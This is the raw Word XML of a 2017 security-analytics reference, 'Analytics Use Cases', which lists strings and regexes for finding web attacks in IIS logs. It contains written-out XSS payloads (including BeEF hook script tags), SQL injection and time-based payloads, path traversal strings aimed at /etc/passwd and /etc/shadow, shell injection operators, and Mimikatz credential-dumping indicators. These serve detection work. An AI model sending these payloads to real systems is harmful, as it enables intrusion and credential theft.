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D3" w:rsidRPr="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E7526F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Analytics Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Detecting the following strings in the IIS logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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XSS Detection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&lt;script&gt;alert(xss)&lt;/script&gt;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”&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;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aaaa”&gt;&lt;script&gt;alert(1)&lt;/script&gt;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&lt;script&gt;prompt(’1’)&lt;/script&gt;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‘&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;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&lt;script&gt;alert(‘xss’);&lt;/script&gt;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&lt;scr&lt;script&gt;ipt&gt;alert(xss)&lt;/scr&lt;/script&gt;ipt&gt;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&lt;script&gt;&lt;script&gt;alert(1)&lt;/script&gt;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&lt;script language=”javascript”&gt;window.location.href = ”beeftrap.html” ; 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&lt;script src=”</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://beefhook.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”&gt;&lt;/script&gt;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&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt;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%00&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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&lt;img onerror=alert(1) src=a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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SQL Injection Detection – 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 OR 1=1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’ OR 1=1 --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” OR 1=1 --’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OR 1=1;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 AND 1=1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x’ OR ’1’=’1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‘ OR 1 in (@@version)--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‘ UNION (select @@version) --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 OR sleep(___TIME___)#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’ OR sleep(___TIME___)#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” OR sleep(___TIME___)#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 or benchmark(10000000,MD5(1))#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’ or benchmark(10000000,MD5(1))#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” or benchmark(10000000,MD5(1))#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;waitfor delay '0:0:__TIME__'--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);waitfor delay '0:0:__TIME__'--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';waitfor delay '0:0:__TIME__'--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";waitfor delay '0:0:__TIME__'--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 1=1 ORDER BY table_name DESC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x’; UPDATE table SET value WHERE user=’x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1’; INSERT INTO table VALUES(‘value’,‘value’);--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 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM table WHERE foo=n)$ --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E75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’ union select null,LOAD_FILE(’../../../../../etc/passwd’),null,null,null –</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr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</w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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Commands to detect Web attacks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Regex to identify attempts to exploit Stored Procedures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - /exec(\s|\+)+(s|x)p\w+/ix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Regex to identify “|” symbol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - /(\||%00|system\(|eval\(|`|\\)/i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Regex to identify Remote File Inclusion - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/(https?|ftp|php|data):/i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Regex to identify Directory\Path Traversal or dot-dot-slash attack - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/(\.|(%|%25)2E)(\.|(%|%25)2E)(\/|(%|%25)2F|\\|(%|%25)5C)/i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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Regex to identify Session IDs, user/session information, user names, passwords – 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ab/>
        <w:t>\.jsp.*\?.*(userId|password)=./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/;jsessionid=./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</w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F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Detecting Shell executions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`shell_command` - executes the command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$(shell_command) - executes the command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| shell_command - executes the command and returns the output of the command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|| shell_command - executes the command and returns the output of the command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; shell_command - executes the command and returns the output of the command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&amp;&amp; shell_command executes the command and returns the output of the command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&gt; target_file - overwrites the target file with the output of the previous command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&gt;&gt; target_file - appends the target file with the output of the previous command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 target_file - send contents of target_file to the previous command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operator - Add additional operations to target command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</w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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Directory\Path Traversal detection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etc/passwd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/etc/passwd%00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../etc/passwd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../../etc/passwd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../../../etc/passwd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../../../../etc/passwd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../../../../boot/grub/grub.conf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../../../../../var/log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../../../../../etc/apache2/httpd.conf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..\..\..\../c/boot.ini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..\../..\../boot.ini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../../../../../../etc/shadow&amp;=%3C%3C%3C%3C%3C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..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd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%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd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..%5c..%5c..%5c..%5c..%5c..%5cc/boot.ini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/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd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/admin/index.html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//admin/index.html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/admin/./index.html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/admin/../admin/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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/admin/./../admin/index.html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</w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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Double Encoding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%253Cscript%253Ealert('XSS')%253C%252Fscript%253E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526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Regex to Identify – Base64 Strings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“\A[a-zA-Z\d\/+]+={,2}\z”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“/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==|[A-Z0-9+\/]{3}=|[A-Z0-9+\/]{4})$/i;”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“^[A-Za-z0-9+\/=]+\Z”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F"/>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F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SQL Injection Attack Patterns Detection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Regex to Identify SQL Keywords - /((\%27)|(\'))(select|union|insert|update|delete|replace|truncate)/ix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Regex to identify ‘ &amp; -- delimiter - /(\')|(\%27)|(</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>\\)|(#)|(\%23)/ix</w:t>
        </w:r>
      </w:hyperlink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Regex to identify “=” - /((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i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Regex to identify attempts to exploit Stored Procedures - /exec(\s|\+)+(s|x)p\w+/ix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Regex to identify “|” symbol - /(\||%00|system\(|eval\(|`|\\)/i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Regex to identify Remote File Inclusion - /(https?|ftp|php|data):/i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Directory\Path Traversal Attack Patterns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Regex to identify Directory\Path Traversal or dot-dot-slash attack - /(\.|(%|%25)2E)(\.|(%|%25)2E)(\/|(%|%25)2F|\\|(%|%25)5C)/i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F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==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F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Malicious Filename and paths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Mimikatz.exe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mimilove.exe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mimidrv.sys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mimilib.dll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SEKURLSA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LSADUMP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\.kirbi$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c:\temp\lsass.dmp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lsass.dmp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c:\temp\mimikatz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./mimikatz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Invoke-Mimikatz.ps1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Invoke-mimikittenz.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F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Clear Text Credit cards detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pP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"/5\d{3}(\s|-)?\d{4}(\s|-)?\d{4}(\s|-)?\d{4}/" MasterCard number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"/4\d{3}(\s|-)?\d{4}(\s|-)?\d{4}(\s|-)?\d{4}/" Visa card number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E752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"/3\d{3}(\s|-)?\d{6}(\s|-)?\d{5}/" American Express card number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F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==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1845"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Regex to detect the malicious sites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1845"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>/wp-(includes|admin|content)/.*\.(exe|dll|scr)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1845"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Regex to detect the Onion and Tor sites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F" w:rsidP="00E7526F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1845"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>[a-z0–9]{16}\.(onion|tor2web|torlink)\.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F"/>
    <w:p w:rsidR="00E7526F" w:rsidRDefault="00E7526F"/>
    <w:sectPr w:rsidR="00E7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E204D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC406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A7254E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBF88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B65809"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1966B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DC5FBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1D02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98"/>
    <w:rsid w:val="000671DF"/>
    <w:rsid w:val="004B3242"/>
    <w:rsid w:val="00504060"/>
    <w:rsid w:val="005F5898"/>
    <w:rsid w:val="00E7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81215-5030-444E-BED7-DB6CEDAB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52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26F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efhook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Mohan Pamidimukkala</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mohan Kumar Manivannan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-30T06:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-30T06:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>